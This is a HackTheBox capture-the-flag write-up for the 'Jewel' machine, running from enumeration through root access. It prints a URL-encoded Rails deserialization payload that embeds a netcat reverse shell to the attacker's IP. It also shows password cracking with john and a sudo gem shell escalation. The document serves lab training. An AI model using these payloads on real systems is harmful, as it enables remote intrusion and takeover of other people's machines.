February 13, 2021 5 min to read

HackTheBox Jewel Writeup

Hackthebox Jewel Writeup

Methodlogy

• Nmap Scan
• Enumerating the web service
• found a version of ruby and exploit of it.
• server side template injection exploitation
• found the password of user bill in /var/backup
• found the secret token of Google Authenticator
• using sudo -l leads us to final part!.

Nmap Scan

as always, i’ll do nmap scan to find out which services running in this machine, and i found these services.

• 22 for ssh service.
• 8000 for http
• 8080 for nginx

nmap -Pn -sC -sV -oN scan.txt 10.10.10.211

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Service Enumeration

• let’s add jewel.htb to our /etc/hosts and start enumerating the web service.

i’ve found a basic blog on port 8080

• let’s sign up and look deeper.

• here i’m logged in.

let’s check the port 8000 now.

it’s a .git directory, let’s check if there is any good things for us.

click on .git and click on intial commit and yoi will find some Gem files so let’s check it.

in the gem file i found the ruby version.

and there’s exploit for this version

• Link: Ruby On Rils

now we need to register a new user and put the payload in the username field to get a reverse shell.

let’s register a new user and click on profile and click edit and click save and intercept the request with burpsuite.

put this payload in username filed with changing the IP address.

• payload: %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.XX.XX+9001+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T

• send the request twice and then refresh the web page.

• don’t forget to start nc listener.

• nice!, we got a reverse shell now.

Privilege Escalation

after some eumeration i found the password of the user bill in /var/backups

• let’s crack the password now.

sudo john –wordlist=/usr/share/wordlists/rockyou.txt pass

when you try sudo -l you will see that it’s request Verification code.

there is a hidden file in home directory of bill which contain a secret token of google authenticator.

so we need to add the google authnticator GAuth addon to google chrome and put the secret token in it and it will generate the OTP for us.

• and here’s the OTP

let’s check “sudo -l” again.

in this part i spend a day to identify my mistake but i didn’t find anything until my friend told me this machine is all about sync.

• let’s check the time and the date.

it’s different date and time from my local date and time, so we need to change it.

• let’ check again

nice!, we will use gem command to get root ,let’s open gtfobins now.

sudo gem open -e “/bin/sh -c /bin/sh” rdoc

• rooted

• Thanks For Reading

• cheers!